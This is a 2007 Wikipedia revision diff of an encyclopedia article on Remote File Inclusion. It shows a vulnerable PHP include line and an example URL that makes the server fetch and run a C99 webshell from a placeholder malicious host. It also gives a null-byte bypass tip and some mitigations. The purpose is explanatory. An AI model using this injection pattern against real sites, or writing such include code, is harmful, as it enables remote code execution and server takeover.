File inclusion vulnerability: Difference between revisions
No edit summary |
seriously, wtf? please join the discussion and stop making your unhelpful edits |
||
| Line 1: | Line 1: | ||
Remote File Inclusion |
'''Remote File Inclusion''' (RFI) is a technique used to attack [[Internet]] websites from a remote computer. |
||
==How the attack works== |
|||
Remote File Inclusion attacks allow [[black hat|malicious users]] to run their own [[PHP]] code on a vulnerable website. The attacker is allowed to include his own malicious code in the space provided for PHP programs on a web page. For instance, a piece of vulnerable PHP code would look like this: |
|||
''include($title . '/archive.php');'' |
|||
This line of PHP code, when executed, yields a URL like the following: |
This line of PHP code, when executed, yields a [[Uniform Resource Locator|URL]] like the following example: |
||
''www.vulnerable.website.com/index.php?title=archive.php?'' |
|||
Because the |
Because the <code>$title</code> variable is not specifically defined, an attacker can insert the location of a malicious file into the URL and execute it on the target server as in this example: |
||
''www.vulnerable.website.com/index.php?title=<nowiki>http://www.malicious.code.com/C99.php</nowiki>?archive.php'' |
|||
The <code>include</code> function above instructs the server to retrieve <code>archive.php</code> and run its code. The code does not say what to do if the user changes <code>archive.php</code> to a file of his own, so the script runs whatever file <code>archive.php</code> is replaced with. In this case, the script would execute the malicious file, <code><nowiki>http://www.malicious.code.com/C99.php</nowiki></code>. |
|||
*Note: "?archive.php" is added to the end of the URL above only to satisfy "/archive.php" in the PHP code |
|||
which helps avoid errors when executing the code. Simply adding %00 (an ASCII null byte) instead of |
|||
"?archive.php" will have the same effect and is for obvious reasons easier to use.* |
|||
This allows the attacker to include any remote file of his choice simply by editing the URL. Attackers commonly include a malicious PHP script called a webshell, also known as a c99 shell or PHP shell. A webshell can display the files and folders on the server and can edit, add or delete files, among other tasks. Potentially, the attacker can use the webshell to gain administrator-level, or [[root]], access on the server. |
|||
==Why the attack works== |
|||
The include function above instructs the server to retrieve "archive.php" and run its code. However, the code does not say what to do if the user changes "archive.php" to a file of his own (http://www.malicious.code.com/C99.php); So the script runs whatever file "archive.php" is replaced with. In this case, C99.php. This allows the hacker to include any remote file of his choice simply by editing the URL. Usually, the remote file a hacker chooses to include is a webshell. This tool written in the PHP coding language displays the files and folders on the server and can edit or add or delete files among other tasks. A webshell is commonly referred to among hackers as a c99 shell or PHP shell. Once this task is completed, the attacker can see, edit and add any file on the server and potentially escalate his privileges to root (administrator on Linux) if the server is not patched. |
|||
RFI attacks are possible because of a PHP configuration flag called <code>register_globals</code>. <code>register_globals</code> automatically defines variables in the script that are entered in the page URL. In this example, the <code>$title<code> variable will automatically be filled with <code><nowiki>http://www.malicious.code.com/C99.php?archive.php</nowiki></code> before the script is executed. Because of this security vulnerability, <code>register_globals</code> is set to OFF by default on newer servers. |
|||
==See also== |
|||
The reason this is possible is because of "register_globals". Register_globals is a script built into certain servers to allow easy access to remote files in a website. The register_globals open either local files (files on the server itself) or remote files (files on other servers) in the webpage that requests it. This was originally created to ease the pain of being a server administrator, but ended up being a nightmare for many website owners. Register_globals in now set to OFF by default on newer servers because of the problems it created but can still be easily turned ON at any time. |
|||
[[Code injection]] |
|||
==Links== |
|||
By turning off register_globals, you can easily avoid most of these problems. Another way to eliminate these threats is to define what the included file, in our case "archive.php", can and can't be. By doing this, if an attacker tries to include his own file, the PHP program will stop executing because the malicious file is not part of the acceptable file definition. One last tool that has been implemented in newer versions of servers is "Magic Quotes", which is a program that recognizes certain characters in URL's (ie. / ; : ( ) ') and replaces them with another character like a quotation mark. This program brings any attempt at including a malicious file to a halt. |
|||
[http://php.net/include PHP: include()]<br /> |
|||
[http://php.net/register_globals PHP: Using Register Globals]<br /> |
|||
[http://php.net/manual/en/ref.filesystem.php#ini.allow-url-fopen PHP: Filesystem Functions: allow-url-fopen] |
|||
{{internet-stub}} |
|||
Adam Raymond |
|||
[[Category:Injection exploits]] |
|||
[[de:Remote File Inclusion]] |
|||
[[es:Remote File Inclusion]] |
|||
Revision as of 19:30, 27 August 2007
Remote File Inclusion (RFI) is a technique used to attack Internet websites from a remote computer.
How the attack works
Remote File Inclusion attacks allow malicious users to run their own PHP code on a vulnerable website. The attacker is allowed to include his own malicious code in the space provided for PHP programs on a web page. For instance, a piece of vulnerable PHP code would look like this:
include($title . '/archive.php');
This line of PHP code, when executed, yields a URL like the following example:
www.vulnerable.website.com/index.php?title=archive.php?
Because the $title variable is not specifically defined, an attacker can insert the location of a malicious file into the URL and execute it on the target server as in this example:
www.vulnerable.website.com/index.php?title=http://www.malicious.code.com/C99.php?archive.php
The include function above instructs the server to retrieve archive.php and run its code. The code does not say what to do if the user changes archive.php to a file of his own, so the script runs whatever file archive.php is replaced with. In this case, the script would execute the malicious file, http://www.malicious.code.com/C99.php.
This allows the attacker to include any remote file of his choice simply by editing the URL. Attackers commonly include a malicious PHP script called a webshell, also known as a c99 shell or PHP shell. A webshell can display the files and folders on the server and can edit, add or delete files, among other tasks. Potentially, the attacker can use the webshell to gain administrator-level, or root, access on the server.
Why the attack works
RFI attacks are possible because of a PHP configuration flag called register_globals. register_globals automatically defines variables in the script that are entered in the page URL. In this example, the $title variable will automatically be filled with http://www.malicious.code.com/C99.php?archive.php before the script is executed. Because of this security vulnerability, register_globals is set to OFF by default on newer servers.
See also
Links
PHP: include()
PHP: Using Register Globals
PHP: Filesystem Functions: allow-url-fopen
This Internet-related article is a stub. You can help Wikipedia by expanding it.
